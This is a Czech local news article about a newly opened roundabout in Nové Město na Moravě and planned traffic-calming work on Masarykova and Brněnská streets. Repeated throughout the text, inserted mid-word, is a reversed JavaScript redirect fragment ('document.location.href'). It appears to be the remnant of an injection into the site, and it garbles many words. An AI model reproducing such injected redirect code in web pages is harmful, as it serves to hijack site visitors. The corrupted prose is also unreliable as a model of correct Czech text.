Rainbow page separator

Novou okružní křižovatku doplní zeleň a další prvky

Sobota, 20. listopadu 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Ozelenění ploch, výsadby nových stromů a instalace některých doplňkových prvků ještě čeká novou kruhovou křižovatku ulic Masarykova, Soškova a Křičkova. Ta byla po více než půl roku trvajících stavebních pracích, které s sebou přinesly také komplikace pro mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristy, obyvatele lokality i lidi žijící ve čtvrtích, kudy vedly objízdné trasy, zprovozněna v polovině října.
Opatření vedoucí ke zklidnění dopravy ve frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované Masarykově ulici budou pokračovat. V další fázi má mimo jiné dojít k zúžení komunikace a úpravě přechodů pro chodce, které již nevyhovují normám kvůli své délce. Jedná se o přechody na trase z náměstí k ulici Budovatelů a před Penny Marketem. Tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to etapu má zakončit výstavba okružní křižovatky na Komenského náměstí. Ta se momentálně nachází ve fázi studie, s projektem se počítá příští rok a stavba je předběžně naplánovaná na rok 2023, případně 2024.
Třetím „retardérem“ by se měl v budoucnu stát kruhový objezd na křižovatce u Billy v ulici Brněnská. Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že se dotkne státní silnice I/19, měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude na projektu spolupracovat s Ředitelstvím silnic a dálnic ČR coby správcem komunikace.